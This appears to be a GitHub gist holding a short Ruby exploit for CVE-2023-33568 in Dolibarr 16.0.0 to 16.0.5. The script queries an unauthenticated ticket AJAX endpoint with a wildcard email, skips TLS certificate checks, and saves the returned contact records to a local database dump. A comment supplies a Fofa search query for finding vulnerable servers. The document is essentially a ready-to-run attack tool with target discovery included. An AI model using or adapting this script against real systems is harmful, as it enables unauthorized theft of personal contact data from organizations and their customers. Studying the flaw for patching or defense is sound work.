Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Created June 24, 2023 18:56
Show Gist options
  • Save komodoooo/5bf30ba86dc5991304fcf34a7a6f5e26 to your computer and use it in GitHub Desktop.
Save komodoooo/5bf30ba86dc5991304fcf34a7a6f5e26 to your computer and use it in GitHub Desktop.
CVE-2023-33568 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-33568
Dolibarr 16.0.0 to 16.0.5 unauthenticated DB access exploit
By komodo\n
"""
=begin
Exploit works only if a contact file exists on the vulnerbale target.
Fofa query to search vulnerable targets:
app="Dolibarr"&&(body="16.0.0"||body="16.0.1"||body="16.0.2"||body="16.0.3"||body="16.0.4"||body="16.0.5")
=end
$cont=1
$dirname="Dolibarr_dump"
def dir(name=$dirname)
begin
Dir.mkdir(name)
Dir.chdir(name)
rescue Errno::EEXIST
$cont+=1
dir("#{$dirname}-#{$cont}")
end
end
def main(url)
url.delete_suffix!("/") unless url[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
r=HTTP.get("#{url}/public/ticket/ajax/ajax.php?action=getContacts&email=%",:ssl_context=>@ctx)
if r.body.to_s[0..0xc]=='{"contacts":['&&r.body.to_s[0xd]!="]"
dir()
File.open("!target.txt", "w"){|f|f.write(url)}
File.new("db_dump.json","w").write(r.body)
puts "Database dump saved on '#{Dir.pwd.split("/")[-1]}/db_dump.json' file."
else
puts "Not vulnerable! :(\n"
end
end
begin
print "Base URL: "
main(gets.chomp)
rescue => e
abort(e.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment